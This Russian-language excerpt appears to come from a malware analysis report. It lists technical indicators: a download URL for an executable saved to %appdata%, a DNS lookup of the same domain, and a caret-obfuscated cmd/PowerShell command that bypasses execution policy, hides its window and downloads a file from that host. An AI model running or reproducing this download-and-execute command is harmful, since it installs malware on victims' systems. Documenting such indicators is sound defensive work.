Техническая информация
- http://asimdep.com/modules/mod_imagestyle/mcgregor.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "POWer^Sh^eL^l.^ExE^ -^E^XEcutiOnP^olIC^Y ^byp^as^s^ -^nOPR^oFIl^E^ -W^i^nd^oW^sT^yLE^ H^Id^deN^ (^n^E^w^-O^bJeC^t S^YSt^EM.^neT.wE^bcL^IENT)^.Downlo^adF^ile^(^'http://asimdep.com/modu...
- DNS ASK as##dep.com
- '<SYSTEM32>\cmd.exe' /C "POWer^Sh^eL^l.^ExE^ -^E^XEcutiOnP^olIC^Y ^byp^as^s^ -^nOPR^oFIl^E^ -W^i^nd^oW^sT^yLE^ H^Id^deN^ (^n^E^w^-O^bJeC^t S^YSt^EM.^neT.wE^bcL^IENT)^.Downlo^adF^ile^(^'http://asimdep.com/modu...' (со скрытым окном)